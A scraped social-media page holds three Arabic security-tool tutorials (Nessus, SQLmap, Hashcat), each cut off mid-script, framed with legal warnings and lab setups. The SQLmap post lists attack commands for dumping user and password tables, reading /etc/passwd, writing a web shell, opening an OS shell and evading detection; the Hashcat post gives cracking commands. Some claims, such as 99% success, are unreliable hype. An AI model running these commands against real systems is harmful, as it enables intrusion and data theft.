م. عمر عبدالعزيز البتراء - Eng. Omar Abdulaziz AL-Btra'a

  • Home
  • Yemen
  • Sanaa
  • م. عمر عبدالعزيز البتراء - Eng. Omar Abdulaziz AL-Btra'a

م. عمر عبدالعزيز البتراء - Eng. Omar Abdulaziz AL-Btra'a Software Engineer | Senior Full Stack Developer

 # 🔍 اليوم الرابع عشر: Nessus - العين الفاحصة لثغرات الأنظمة # # 🔥 المقدمة التفاعليةبعد 13 يوماً من إتقان أدوات الأمان، ...
09/09/2025

# 🔍 اليوم الرابع عشر: Nessus - العين الفاحصة لثغرات الأنظمة

# # 🔥 المقدمة التفاعلية

بعد 13 يوماً من إتقان أدوات الأمان، اليوم نلتقي بالطبيب الشامل للأنظمة الرقمية! 🩺

تخيل أن لديك ماسح ضوئي سحري يستطيع رؤية كل نقطة ضعف في شبكتك، كل ثغرة مخفية، وكل تهديد كامن! يفحص آلاف الخدمات في دقائق ويقدم تشخيصاً دقيقاً مع العلاج! 🌟

🏆 **حقيقة مذهلة**: Nessus يحتوي على أكثر من 190,000 plugin لفحص الثغرات!

⚡ **قوة شاملة**: يفحص كل شيء - من أنظمة التشغيل إلى تطبيقات الويب إلى الأجهزة المدمجة!

**🔍 السؤال الحاسم**: إذا كانت شبكتك تبدو آمنة من الخارج، فماذا يخفي Nessus من نقاط ضعف لا تراها؟

**🎯 تحدي اليوم**: من يستطيع إعداد Nessus وإجراء فحص شامل لشبكة تدريبية واكتشاف الثغرات المخفية؟ (فقط في بيئة قانونية! 🛡️)

# # 🛠️ ما هو Nessus؟

**Tenable Nessus** هو الملك المتوج لماسحات الثغرات عالمياً - الأداة الأكثر انتشاراً واعتماداً في عالم الأمان السيبراني! 👑

# # # 🎭 لماذا Nessus لا يُنافس؟
- 🎯 **شمولية مطلقة**: يفحص كل نوع من أنواع الأنظمة والتطبيقات
- 🧠 **ذكاء متطور**: محرك فحص ذكي مع تعلم آلي
- 🌐 **تغطية واسعة**: دعم لآلاف التقنيات والبروتوكولات
- 🔧 **سهولة الاستخدام**: واجهة ويب بديهية وقوية
- ⚡ **سرعة فائقة**: فحص آلاف الأنظمة بكفاءة عالية
- 🕵️ **دقة عالية**: معدل إنذار كاذب منخفض جداً
- 📊 **تقارير احترافية**: تقارير مفصلة جاهزة للإدارة

# # # 🎨 أنواع الفحوصات المدعومة:
- **Network Vulnerability Scans**: فحص ثغرات الشبكة
- **Web Application Scans**: فحص تطبيقات الويب
- **Database Scans**: فحص قواعد البيانات
- **Configuration Audits**: مراجعة إعدادات الأمان
- **Compliance Checks**: فحوصات الامتثال
- **Malware Detection**: كشف البرمجيات الخبيثة
- **Policy Compliance**: مراقبة السياسات الأمنية
- **SCADA/ICS Security**: أمان الأنظمة الصناعية
- **Cloud Security**: أمان البيئات السحابية
- **Mobile Device Security**: أمان الأجهزة المحمولة

# # # المستوى المطلوب: 🟡 متوسط إلى متقدم

# # 🧠 فلسفة Nessus - الفحص الشامل الذكي

Nessus يؤمن بأن الأمان الحقيقي يأتي من المعرفة الكاملة بنقاط الضعف قبل أن يكتشفها المهاجمون:

# # # 🎯 منهجية الفحص:
1. **Discovery**: اكتشاف الأنظمة والخدمات الحية
2. **Port Scanning**: فحص المنافذ المفتوحة
3. **Service Detection**: تحديد الخدمات وإصداراتها
4. **Vulnerability Assessment**: تقييم الثغرات المحتملة
5. **Compliance Testing**: اختبار الامتثال للمعايير
6. **Reporting**: تقديم تقارير مفصلة وقابلة للتنفيذ

# # # 🔍 مستويات خطورة Nessus:
- **Critical**: ثغرات حرجة تتطلب إصلاحاً فورياً
- **High**: ثغرات عالية الخطورة
- **Medium**: ثغرات متوسطة الخطورة
- **Low**: ثغرات منخفضة الخطورة
- **Info**: معلومات إضافية للتوعية

# # 💻 التطبيق العملي - إتقان Nessus

# # # 🔽 التثبيت والإعداد:

```bash
# === تثبيت Nessus على Ubuntu/Debian ===

# تحميل Nessus (يتطلب تسجيل مجاني)
# زيارة: https://www.tenable.com/products/nessus/nessus-essentials
# تحميل ملف .deb للنظام

# تثبيت الحزمة المحملة
sudo dpkg -i Nessus-10.6.4-ubuntu1604_amd64.deb

# بدء خدمة Nessus
sudo systemctl start nessusd
sudo systemctl enable nessusd

# === التثبيت على CentOS/RHEL ===
# تحميل ملف .rpm
sudo rpm -ivh Nessus-10.6.4-es8.x86_64.rpm
sudo systemctl start nessusd
sudo systemctl enable nessusd

# === التثبيت على Windows ===
# تحميل وتشغيل ملف .msi من موقع Tenable
# اتباع معالج التثبيت

# === الوصول لواجهة الويب ===
# فتح المتصفح والذهاب إلى:
https://localhost:8834

# === الإعداد الأولي ===
# إنشاء مستخدم مدير
# تفعيل الترخيص (Essentials مجاني)
# تحديث قاعدة بيانات الثغرات
```

# # # 🌐 الاستخدام الأساسي:

```bash
# === فحوصات أساسية عبر واجهة الويب ===

# 1. إنشاء فحص جديد
# - New Scan
# - اختيار نوع الفحص: Basic Network Scan
# - تسمية الفحص: "Network Security Assessment"
# - تحديد الأهداف: 192.168.1.0/24

# 2. إعدادات الفحص المتقدمة
# - Discovery: Port scan range, ping methods
# - Assessment: Web applications, malware detection
# - Credentials: SSH, Windows, SNMP credentials
# - Plugins: تحديد فئات الثغرات للفحص

# === فحص شامل للشبكة ===
Target: 192.168.1.0/24
Scan Type: Advanced Network Scan
Port Range: 1-65535
Credentials: SSH root credentials
Web App Scan: Enabled
Malware Detection: Enabled

# === فحص تطبيق ويب ===
Target: https://webapp.company.com
Scan Type: Web Application Tests
Authentication: Form-based (admin/password)
Crawl Depth: 5 levels
SQL Injection Tests: Enabled
XSS Tests: Enabled
```

# # # 🚀 تقنيات متقدمة:

```bash
# === إعداد فحوصات مبرمجة ===

# فحص يومي للخوادم الحرجة
Schedule: Daily at 02:00 AM
Targets: Critical servers list
Scan Type: Credentialed Network Scan
Email Notifications: [email protected]

# فحص أسبوعي شامل للشبكة
Schedule: Weekly Sunday 11:00 PM
Targets: Entire corporate network
Scan Type: Full Network Audit
Report Format: Executive Summary + Technical Details

# === استخدام APIs للأتمتة ===

#!/bin/bash
# nessus_automated_scan.sh

NESSUS_URL="https://nessus-server:8834"
ACCESS_KEY="your-access-key"
SECRET_KEY="your-secret-key"

# بدء فحص جديد
curl -X POST "$NESSUS_URL/scans" \
-H "X-ApiKeys: accessKey=$ACCESS_KEY; secretKey=$SECRET_KEY" \
-H "Content-Type: application/json" \
-d '{
"uuid": "network-basic-scan-template",
"settings": {
"name": "Automated Security Scan",
"targets": "192.168.1.0/24",
"launch": "ON_DEMAND"
}
}'

# جلب نتائج الفحص
SCAN_ID="12345"
curl -X GET "$NESSUS_URL/scans/$SCAN_ID" \
-H "X-ApiKeys: accessKey=$ACCESS_KEY; secretKey=$SECRET_KEY" \
| jq '.vulnerabilities[] | select(.severity > 2)'
```

# # 📊 Nessus vs الأدوات الأخرى

# # # 🔬 مقارنة متخصصة:

**🔍 Nessus:**
• التخصص: فحص شامل للثغرات والامتثال
• عدد الثغرات: 190,000+ plugin
• سهولة الاستخدام: سهل جداً (واجهة ويب)
• دقة الكشف: عالية جداً (معدل إنذار كاذب منخفض)
• السرعة: سريع ومُحسَّن
• التكلفة: مجاني (Essentials) / مدفوع (Professional)
• الأفضل لـ: فحص شامل للمؤسسات

**🛡️ OpenVAS:**
• التخصص: فحص ثغرات مفتوح المصدر
• عدد الثغرات: 50,000+ test
• سهولة الاستخدام: متوسط (أكثر تعقيداً)
• دقة الكشف: جيدة (معدل إنذار كاذب أعلى)
• السرعة: متوسطة
• التكلفة: مجاني تماماً
• الأفضل لـ: الميزانيات المحدودة

**⚔️ Metasploit:**
• التخصص: استغلال الثغرات
• عدد الثغرات: محدود للاستغلال
• سهولة الاستخدام: صعب (خط أوامر)
• دقة الكشف: عالية للثغرات القابلة للاستغلال
• السرعة: بطيء (تركز على الاستغلال)
• التكلفة: مجاني/مدفوع
• الأفضل لـ: اختبار الاختراق المتقدم

# # ⚠️ الاستخدام الآمن والقانوني

# # # 🛡️ القواعد القانونية المقدسة:

1. **إذن كتابي صريح**: لا تفحص أي نظام لا تملكه أو بدون إذن واضح
2. **تأثير على الأداء**: Nessus قد يؤثر على أداء الأنظمة أثناء الفحص
3. **أوقات الفحص**: جدول الفحوصات في أوقات لا تؤثر على العمل
4. **حماية النتائج**: النتائج تحتوي معلومات حساسة جداً
5. **التوثيق الكامل**: وثق جميع الفحوصات والنتائج
6. **الإصلاح المسؤول**: أصلح الثغرات بأولوية مناسبة

# # # 🚨 تحذيرات قانونية صارمة:

**⚖️ تحذير قانوني - اقرأ بعناية**

**فحص الأنظمة بدون إذن جريمة خطيرة**

استخدام Nessus لفحص أنظمة لا تملكها أو بدون إذن كتابي صريح غير قانوني ويمكن أن يُعتبر:

**🚨 أنشطة إجرامية:**
- الوصول غير المصرح للأنظمة
- إجراء فحوصات قد تؤثر على الأداء
- الحصول على معلومات حساسة
- انتهاك خصوصية الشبكات

**💰 المسؤولية المدنية:**
- أضرار انقطاع الخدمات بسبب الفحص
- تكاليف التحقيق في "الهجمات" المشتبه بها
- انتهاك اتفاقيات مستوى الخدمة
- أضرار السمعة

**🏛️ العقوبات المحتملة:**
- غرامات تصل لمئات الآلاف
- أحكام سجن طويلة المدى
- منع من العمل في الأمان السيبراني
- مقاضاة مدنية من المؤسسات المتضررة

**✅ الاستخدامات القانونية فقط:**
- شبكاتك وأنظمتك الخاصة
- مشاريع اختبار الاختراق المُوثقة والمُصرح بها
- بيئات المختبرات التدريبية
- برامج Bug Bounty بإذن صريح
- البحث الأمني بموافقة أخلاقية مُوثقة

# # 🎯 حالات استخدام متقدمة

# # # 🏢 للشركات وفرق الأمان:

```bash
#!/bin/bash
# === نظام إدارة الثغرات المؤسسي ===

PROGRAM_ID="ENTERPRISE_VM_$(date +%Y%m%d)"
NESSUS_URL="https://nessus.company.com:8834"
COMPANY_NAME="شركة التقنيات المتقدمة"

echo "🏢 برنامج إدارة الثغرات المؤسسي"
echo "معرف البرنامج: $PROGRAM_ID"

mkdir -p "$PROGRAM_ID"
cd "$PROGRAM_ID"

# === إعداد البيئات والنطاقات ===
cat > network_segments.json

 # 💉 اليوم الثاني عشر: SQLmap - الصياد الماكر لثغرات قواعد البياناتبعد 11 يوماً من إتقان أدوات الأمان، اليوم نواجه أخطر ...
06/09/2025

# 💉 اليوم الثاني عشر: SQLmap - الصياد الماكر لثغرات قواعد البيانات

بعد 11 يوماً من إتقان أدوات الأمان، اليوم نواجه أخطر أنواع الثغرات على الإطلاق! 🚨

تخيل أن لديك مفتاحاً سحرياً يفتح قلب أي تطبيق ويب - قاعدة البيانات! حيث تكمن كل الأسرار، كل البيانات، وكل المعلومات الحساسة! 💀

🏆 **حقيقة مرعبة**: SQLmap يستطيع اختراق 99% من قواعد البيانات المعرضة لثغرات SQL injection!

⚡ **قوة مدمرة**: في دقائق معدودة، يمكن لـ SQLmap استخراج قواعد بيانات كاملة بملايين السجلات!

**🔍 السؤال الخطير**: إذا كان تطبيقك يحتوي على ثغرة SQL injection، فما الذي يمنع المخترق من سرقة كل شيء؟

**🎯 تحدي اليوم**: من يستطيع إعداد مختبر آمن واستخدام SQLmap لفهم خطورة SQL injection الحقيقية؟ (فقط في بيئة تدريبية قانونية! 🛡️)

# # 🛠️ ما هو SQLmap؟

**SQLmap** هو أداة مفتوحة المصدر تُعتبر الملك المتوج في اكتشاف واستغلال ثغرات SQL injection! 🐍

# # # 🎭 لماذا SQLmap لا يُقهر؟
- 🎯 **دقة قاتلة**: يكتشف أدق ثغرات SQL injection المخفية
- 🧠 **ذكاء خارق**: خوارزميات متطورة للتحليل التلقائي
- 🌐 **شمولية مطلقة**: يدعم جميع قواعد البيانات الشهيرة
- 🔧 **مرونة لا محدودة**: مئات الخيارات والتقنيات
- ⚡ **سرعة مذهلة**: استخراج بيانات بكفاءة عالية
- 🕵️ **تخفي محترف**: تجنب أنظمة الحماية ببراعة
- 📊 **تقارير شاملة**: توثيق كامل للثغرات المكتشفة

# # # 🎨 قواعد البيانات المدعومة:
- **MySQL**: الأكثر شيوعاً في تطبيقات الويب
- **PostgreSQL**: قاعدة بيانات متقدمة
- **Oracle**: أنظمة المؤسسات الكبيرة
- **Microsoft SQL Server**: بيئات Windows
- **SQLite**: قواعد البيانات المدمجة
- **IBM DB2**: الأنظمة المصرفية
- **وأكثر من 20 نوع آخر**

# # # المستوى المطلوب: 🔴 متقدم إلى خبير

# # 🧠 فلسفة SQLmap - سيطرة على قواعد البيانات

SQLmap يؤمن بأن قاعدة البيانات هي قلب أي تطبيق، ومن يسيطر عليها يسيطر على كل شيء:

# # # 🎯 أنواع SQL Injection المدعومة:
1. **Boolean-based blind**: استخراج البيانات عبر الأجوبة الصحيحة/الخاطئة
2. **Time-based blind**: استخراج البيانات عبر التأخير الزمني
3. **Error-based**: استغلال رسائل الأخطاء لاستخراج البيانات
4. **UNION query-based**: دمج النتائج لاستخراج البيانات
5. **Stacked queries**: تنفيذ استعلامات متعددة
6. **Out-of-band**: استخراج البيانات عبر قنوات خارجية

# # # 🔍 قدرات SQLmap الخارقة:
- **تحديد قاعدة البيانات**: تحديد نوع وإصدار قاعدة البيانات
- **استخراج البيانات**: استخراج جداول وبيانات كاملة
- **الوصول لنظام الملفات**: قراءة وكتابة ملفات النظام
- **تنفيذ الأوامر**: تنفيذ أوامر على الخادم
- **السيطرة على قاعدة البيانات**: السيطرة الكاملة على قاعدة البيانات
- **رفع الصلاحيات**: رفع الصلاحيات داخل قاعدة البيانات

# # 💻 التطبيق العملي - إتقان SQLmap

# # # 🔽 التثبيت والإعداد:

```bash
# === التثبيت على أنظمة مختلفة ===

# Ubuntu/Debian
sudo apt update && sudo apt install sqlmap

# من المصدر (للحصول على آخر إصدار)
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
python3 sqlmap.py --version

# macOS
brew install sqlmap

# Windows
# تحميل من: https://github.com/sqlmapproject/sqlmap/archive/master.zip

# === التحقق من التثبيت ===
sqlmap --version
sqlmap --help

# === تحديث قاعدة البيانات ===
sqlmap --update

# # # 🌐 الأوامر الأساسية:

bash
# === اختبار أساسي للثغرات ===

# اختبار GET parameter
sqlmap -u "http://target.com/page.php?id=1"

# اختبار POST data
sqlmap -u "http://target.com/login.php" --data="username=admin&password=test"

# اختبار مع headers مخصصة
sqlmap -u "http://target.com/api/user" -H "Authorization: Bearer TOKEN"

# اختبار ملف cookies
sqlmap -u "http://target.com/page.php?id=1" --cookie="PHPSESSID=abc123"

# === معلومات قاعدة البيانات ===

# تحديد نوع قاعدة البيانات
sqlmap -u "http://target.com/page.php?id=1" --banner

# الحصول على المستخدم الحالي
sqlmap -u "http://target.com/page.php?id=1" --current-user

# الحصول على قاعدة البيانات الحالية
sqlmap -u "http://target.com/page.php?id=1" --current-db

# عرض جميع قواعد البيانات
sqlmap -u "http://target.com/page.php?id=1" --dbs

# === استخراج البيانات ===

# عرض جداول قاعدة بيانات محددة
sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables

# عرض أعمدة جدول محدد
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns

# استخراج بيانات من جدول
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump

# استخراج أعمدة محددة
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users -C "username,password" --dump
```

# # # 🚀 تقنيات متقدمة:

bash
# === تقنيات التحايل على الحماية ===

# استخدام وكيل
sqlmap -u "http://target.com/page.php?id=1" --proxy="http://127.0.0.1:8080"

# تأخير بين الطلبات
sqlmap -u "http://target.com/page.php?id=1" --delay=2

# عشوائية User-Agent
sqlmap -u "http://target.com/page.php?id=1" --random-agent

# تحديد User-Agent مخصص
sqlmap -u "http://target.com/page.php?id=1" --user-agent="Mozilla/5.0 Custom"

# تجنب الكشف
sqlmap -u "http://target.com/page.php?id=1" --tamper=space2comment,randomcase

# === تقنيات استخراج متقدمة ===

# استخراج مخطط كامل
sqlmap -u "http://target.com/page.php?id=1" --schema

# البحث عن أعمدة بأسماء محددة
sqlmap -u "http://target.com/page.php?id=1" --search -C password,username,email

# البحث عن جداول بأسماء محددة
sqlmap -u "http://target.com/page.php?id=1" --search -T user,admin,account

# === وصول نظام الملفات ===

# قراءة ملف من النظام
sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd"

# كتابة ملف إلى النظام
sqlmap -u "http://target.com/page.php?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"

# === تنفيذ أوامر النظام ===

# الحصول على shell تفاعلي
sqlmap -u "http://target.com/page.php?id=1" --os-shell

# تنفيذ أمر واحد
sqlmap -u "http://target.com/page.php?id=1" --os-cmd="whoami"

# # 📊 SQLmap vs الأدوات الأخرى

# # # 🔬 مقارنة متخصصة:

**💉 SQLmap:**
• التخصص: ثغرات SQL injection حصرياً
• عمق الاستغلال: الأعمق والأشمل عالمياً
• سهولة الاستخدام: متوسط إلى صعب
• دقة الكشف: 99% للثغرات الموجودة
• التكلفة: مجاني تماماً
• قواعد البيانات: جميع الأنواع الشائعة
• الأفضل لـ: اختبار وإستغلال SQL injection

**📡 Wireshark:**
• التخصص: مراقبة حركة الشبكة
• عمق الاستغلال: لا يوجد (مراقبة فقط)
• سهولة الاستخدام: متوسط
• دقة الكشف: ممتازة للشبكة
• التكلفة: مجاني
• قواعد البيانات: لا ينطبق
• الأفضل لـ: تحليل الشبكة والتحقيق

**🛡️ OWASP ZAP:**
• التخصص: أمان تطبيقات الويب عموماً
• عمق الاستغلال: سطحي للـ SQL injection
• سهولة الاستخدام: سهل
• دقة الكشف: متوسطة للـ SQL injection
• التكلفة: مجاني
• قواعد البيانات: كشف محدود
• الأفضل لـ: فحص شامل للتطبيقات

**⚔️ Metasploit:**
• التخصص: استغلال عام للثغرات
• عمق الاستغلال: متوسط للـ SQL injection
• سهولة الاستخدام: صعب
• دقة الكشف: محدودة للـ SQL injection
• التكلفة: مجاني/مدفوع
• قواعد البيانات: وحدات محدودة
• الأفضل لـ: استغلال عام متنوع

# # ⚠️ الاستخدام الآمن والقانوني

# # # 🛡️ القواعد القانونية المقدسة:

1. **إذن كتابي صريح**: لا تستخدم SQLmap إلا على التطبيقات التي تملكها أو لديك إذن كتابي صريح لاختبارها
2. **بيئة معزولة**: استخدم مختبرات منفصلة تماماً عن بيئات الإنتاج
3. **عدم الإضرار بالبيانات**: لا تعدل أو تحذف أو تتلف أي بيانات حقيقية
4. **حماية المعلومات**: لا تصل إلى أو تكشف معلومات شخصية أو حساسة
5. **التوثيق الكامل**: وثق جميع الأنشطة للمراجعة والامتثال القانوني
6. **التبليغ المسؤول**: أبلغ عن الثغرات بطريقة مسؤولة وبناءة

# # # 🔧 إعداد مختبر آمن:

bash
# === إنشاء بيئة تدريب قانونية ===

# تحميل DVWA (تطبيق ويب معرض للثغرات عمداً)
git clone https://github.com/digininja/DVWA.git
cd DVWA
docker-compose up -d

# تحميل WebGoat
docker run -p 8080:8080 webgoat/goatandwolf

# تحميل Mutillidae
docker run -p 80:80 citizenstig/nowasp

# === أمثلة آمنة للتدريب ===

# اختبار DVWA (بيئة آمنة)
sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \
--cookie="PHPSESSID=abc123; security=low" \
--batch

# اختبار WebGoat (بيئة تعليمية)
sqlmap -u "http://localhost:8080/WebGoat/start.mvc /SqlInjection.lesson" \
--forms --batch

# # # 🚨 تحذيرات قانونية صارمة:

**⚖️ تحذير قانوني - اقرأ بعناية**

**الاستخدام غير المصرح به لـ SQLmap غير قانوني**

استخدام SQLmap ضد أنظمة لا تملكها أو بدون إذن كتابي صريح غير قانوني في معظم البلدان وقد يؤدي إلى:

**🚨 اتهامات جنائية:**
- قانون الاحتيال وإساءة استخدام الحاسوب (الولايات المتحدة)
- قانون إساءة استخدام الحاسوب (المملكة المتحدة)
- قوانين الجرائم السيبرانية (الاتحاد الأوروبي)
- تشريعات الأمان السيبراني المحلية

**💰 المسؤولية المدنية:**
- أضرار خروقات البيانات
- تكاليف انقطاع الأعمال
- الرسوم القانونية وتكاليف المحكمة
- أضرار السمعة

**🏛️ العقوبات المحتملة:**
- غرامات باهظة (قد تصل للملايين)
- أحكام بالسجن (قد تصل لأكثر من 20 سنة)
- سجل إجرامي دائم
- تدمير المسيرة المهنية

**✅ الاستخدامات القانونية فقط:**
- تطبيقاتك الخاصة
- اختبار الاختراق المصرح به
- البيئات التعليمية (DVWA، WebGoat)
- برامج مكافآت اكتشاف الأخطاء بإذن
- البحث الأمني بموافقة أخلاقية

# # 🎯 حالات استخدام متقدمة

# # # 🏢 للشركات وفرق الأمان:

bash
# === مراجعة أمان دورية للشركات ===

#!/bin/bash
# corporate_security_audit.sh

AUDIT_ID="CORP_AUDIT_$(date +%Y%m%d)"
APPLICATIONS_FILE="$1"

echo "🏢 مراجعة أمان الشركة لثغرات SQL injection"
echo "معرف المراجعة: $AUDIT_ID"

mkdir -p "$AUDIT_ID"
cd "$AUDIT_ID"

# مراجعة كل تطبيق
while IFS=',' read -r app_name app_url environment; do
echo "🔍 مراجعة: $app_name ($environment)"

mkdir -p "$app_name"

# تحديد إعدادات الاختبار حسب البيئة
if [ "$environment" = "production" ]; then
# إعدادات حذرة للإنتاج
DEPTH=1
RISK=1
DELAY=3
else
# إعدادات شاملة للتطوير
DEPTH=2
RISK=2
DELAY=1
fi

# تنفيذ الاختبار
sqlmap -u "$app_url" \
--batch \
--level=$DEPTH \
--risk=$RISK \
--delay=$DELAY \
--timeout=30 \
--output-dir="$app_name" \
> "$app_name/audit.log" 2>&1

# تحليل النتائج
if grep -q "vulnerable" "$app_name/audit.log"; then
echo "🚨 انتهاك الامتثال: $app_name" | tee -a violations.txt
fi

done < "$APPLICATIONS_FILE"

echo "✅ مراجعة الشركة مكتملة: $AUDIT_ID"

# # # 🔍 لفرق الاستجابة للحوادث:

bash
# === تحليل حادثة أمنية ===

#!/bin/bash
# incident_response_sqlmap.sh

INCIDENT_ID="INC_$(date +%Y%m%d_%H%M%S)"
SUSPECTED_URL="$1"

echo "🚨 تحليل حادثة أمنية مشتبه بها"
echo "معرف الحادثة: $INCIDENT_ID"
echo "الرابط المشتبه به: $SUSPECTED_URL"

mkdir -p "incident_$INCIDENT_ID"
cd "incident_$INCIDENT_ID"

# تحليل سريع للثغرة المحتملة
echo "🔍 تحليل سريع للثغرة..."
sqlmap -u "$SUSPECTED_URL" \
--batch \
--level=3 \
--risk=3 \
--banner \
--current-user \
--current-db \
> incident_analysis.log 2>&1

# تحليل النتائج
if grep -q "vulnerable" incident_analysis.log; then
echo "🚨 تأكيد الثغرة: SQL injection موجودة"

# استخراج معلومات إضافية للتحقيق
sqlmap -u "$SUSPECTED_URL" \
--batch \
--dbs \
--users \
--passwords \
> detailed_analysis.log 2>&1

# إنشاء تقرير الحادثة
cat > incident_report.txt

Hashcat: سيد تكسير كلمات المرورHashcat هي أداة مفتوحة المصدر وقوية للغاية ومتعددة المنصات (تعمل على Windows، Linux، macO...
06/09/2025

Hashcat: سيد تكسير كلمات المرور
Hashcat هي أداة مفتوحة المصدر وقوية للغاية ومتعددة المنصات (تعمل على Windows، Linux، macOS) تُستخدم لـ تكسير كلمات المرور (Password Cracking) أو استعادة كلمات المرور (Password Recovery).

ما يميز Hashcat هو قدرتها الفائقة على الاستفادة من قوة معالجة وحدات معالجة الرسوميات (GPUs)، مما يجعلها أسرع بكثير من استخدام وحدات المعالجة المركزية (CPUs) في معظم عمليات التكسير.

كيف تعمل Hashcat؟
Hashcat لا "تخترق" كلمات المرور مباشرة.

بدلاً من ذلك، هي تقوم بمحاولة تخمين كلمات المرور المحتملة، ثم تقوم بتجزئة (hashing) كل تخمين بنفس الخوارزمية التي تم بها تجزئة كلمة المرور الأصلية، وتقارن الناتج.

إذا تطابق الـ "hash" الناتج مع الـ "hash" المستهدف، فهذا يعني أنها وجدت كلمة المرور الصحيحة.

تخيل أن لديك قائمة بأسماء مستخدمين و"hashes" لكلمات مرورهم (مثل تلك التي قد تُسرق من قاعدة بيانات).

Hashcat تأخذ هذه الـ "hashes" وتحاول إيجاد كلمة المرور الأصلية المرتبطة بها.

لماذا هي مهمة في الأمن السيبراني؟
* تقييم قوة كلمات المرور: يستخدمها مختبرو الاختراق (Pe*******on Testers) لتقييم مدى قوة كلمات المرور المستخدمة في الأنظمة التي يقومون باختبارها.
إذا تمكنت Hashcat من تكسير كلمات المرور بسهولة، فهذا يشير إلى ضعف أمني يجب معالجته.

* التحقيقات الجنائية الرقمية: تساعد في استعادة الوصول إلى الأنظمة أو الملفات المشفرة التي فُقدت كلمات مرورها، أو في تحليل الأدلة للعثور على كلمات مرور مرتبطة بنشاط إجرامي.

* فهم آليات الهجوم: تُظهر للمدافعين كيف يمكن للمهاجمين محاولة تكسير كلمات المرور، مما يساعدهم على بناء دفاعات أفضل مثل فرض سياسات كلمات مرور قوية واستخدام المصادقة متعددة العوامل (MFA).

أنواع الهجمات (Attack Modes) في Hashcat
Hashcat تدعم عدة أساليب للهجوم، كل منها مصمم لسيناريو معين:

* هجوم القاموس (Dictionary Attack):
* الوصف: هذا هو النوع الأكثر شيوعًا.

يقوم Hashcat بتجربة كل كلمة موجودة في ملف قاموس (list of common words, passwords, names, etc.) ككلمة مرور محتملة.

* متى يُستخدم: عندما تتوقع أن تكون كلمات المرور شائعة أو موجودة في قوائم كلمات مرور مسربة.

* مثال: --attack-mode 0 أو -a 0

* هجوم القوة الغاشمة (Brute-force Attack):

* الوصف: تجربة كل تركيبة ممكنة من الأحرف، الأرقام، والرموز حتى يتم العثور على كلمة المرور الصحيحة.

هذا النوع يستغرق وقتًا طويلاً جدًا، خاصةً مع كلمات المرور الطويلة والمعقدة.
* متى يُستخدم: عندما تفشل هجمات القاموس، أو عندما لا يكون لديك أي فكرة عن بنية كلمة المرور.

* مثال: --attack-mode 3 أو -a 3

* هجوم القاعدة (Rule-based Attack):

* الوصف: يطبق قواعد محددة (مثل إضافة أرقام في النهاية، تغيير الأحرف الكبيرة إلى صغيرة، قلب الكلمة) على كلمات موجودة في قاموس.
هذا يزيد من فعالية هجوم القاموس.
* متى يُستخدم: لتحسين هجمات القاموس لاستهداف كلمات المرور التي يضيف إليها المستخدمون تعديلات بسيطة.
* مثال: --attack-mode 6 أو -a 6
* هجوم الدمج (Combinator Attack):
* الوصف: يجمع بين كلمتين من ملفي قاموس مختلفين لتكوين كلمة مرور واحدة.
* متى يُستخدم: عندما تتوقع أن تكون كلمة المرور مكونة من دمج كلمتين شائعتين.
* مثال: --attack-mode 1 أو -a 1
* هجوم القناع (Mask Attack):
* الوصف: شكل أكثر تحديدًا من القوة الغاشمة، حيث تحدد "قناعًا" أو نمطًا للأحرف التي يمكن أن تكون كلمة المرور (مثل "4 أحرف صغيرة ثم 3 أرقام"). هذا يقلل من مساحة البحث بشكل كبير.
* متى يُستخدم: عندما يكون لديك فكرة عن نمط كلمة المرور (مثل تاريخ ميلاد، اسم مع أرقام).
* مثال: --attack-mode 3 أو -a 3 (نفس وضع القوة الغاشمة، لكن مع تحديد القناع)
أساسيات الأوامر في Hashcat
تنسيق الأمر العام:
hashcat [options] [dictionary_file(s)/mask]

أهم الخيارات (Options):
* -m : يحدد نوع الـ "hash" الذي تحاول تكسيره. هذا هو الخيار الأكثر أهمية. Hashcat تدعم الآلاف من أنواع الـ "hashes" المختلفة (MD5, SHA1, NTLM, WPA/WPA2, الخ). ستحتاج إلى معرفة رقم الـ hash_type الصحيح.
* مثال: 0 لـ MD5، 1000 لـ NTLM، 2500 لـ WPA/WPA2. يمكنك العثور على قائمة كاملة في وثائق Hashcat أو باستخدام الأمر hashcat --help.
* -a : يحدد وضع الهجوم.
* 0: هجوم القاموس (Dictionary Attack)
* 1: هجوم الدمج (Combinator Attack)
* 3: هجوم القوة الغاشمة/القناع (Brute-force/Mask Attack)
* 6: هجوم القاعدة (Rule-based Attack)
* -o : يحدد ملفًا لحفظ كلمات المرور المكسورة فيه.
* --force: لتجاوز بعض التحذيرات (يجب استخدامه بحذر).
* --show: لعرض الـ "hashes" المكسورة سابقًا المخزنة في ملف الـ potfile الخاص بـ Hashcat.
* --status: لعرض حالة التقدم أثناء عملية التكسير.
* --quiet: لتشغيل Hashcat بصمت بدون إظهار رسائل الحالة.
أمثلة على أوامر Hashcat
لنفترض أن لديك ملفًا باسم hashes.txt يحتوي على الـ "hashes" التي تريد تكسيرها، وملف قاموس باسم wordlist.txt.
1. تكسير MD5 Hashes باستخدام هجوم القاموس:
hashcat -m 0 -a 0 hashes.txt wordlist.txt -o cracked_md5.txt

* -m 0: نوع الهاش هو MD5.
* -a 0: وضع الهجوم هو القاموس.
* hashes.txt: ملف يحتوي على الـ hashes.
* wordlist.txt: ملف القاموس.
* -o cracked_md5.txt: لحفظ كلمات المرور المكسورة في هذا الملف.
2. تكسير NTLM Hashes باستخدام هجوم القوة الغاشمة (Mask Attack):
لنفترض أنك تعلم أن كلمة المرور مكونة من 8 أحرف صغيرة فقط.
hashcat -m 1000 -a 3 hashes.txt ?l?l?l?l?l?l?l?l -o cracked_ntlm.txt

* -m 1000: نوع الهاش هو NTLM.
* -a 3: وضع الهجوم هو القوة الغاشمة/القناع.
* hashes.txt: ملف الـ hashes.
* ?l?l?l?l?l?l?l?l: هذا هو القناع.
* ?l يمثل حرفًا صغيرًا (lowercase letter).
* ?u يمثل حرفًا كبيرًا (uppercase letter).
* ?d يمثل رقمًا (digit).
* ?s يمثل رمزًا خاصًا (special character).
* ?a يمثل أي حرف (lowercase, uppercase, digit, special).
3. تكسير WPA/WPA2 (Wi-Fi) Hashes باستخدام هجوم القاموس:

ملف الـ hash لشبكات Wi-Fi غالبًا ما يكون ملفًا بصيغة .

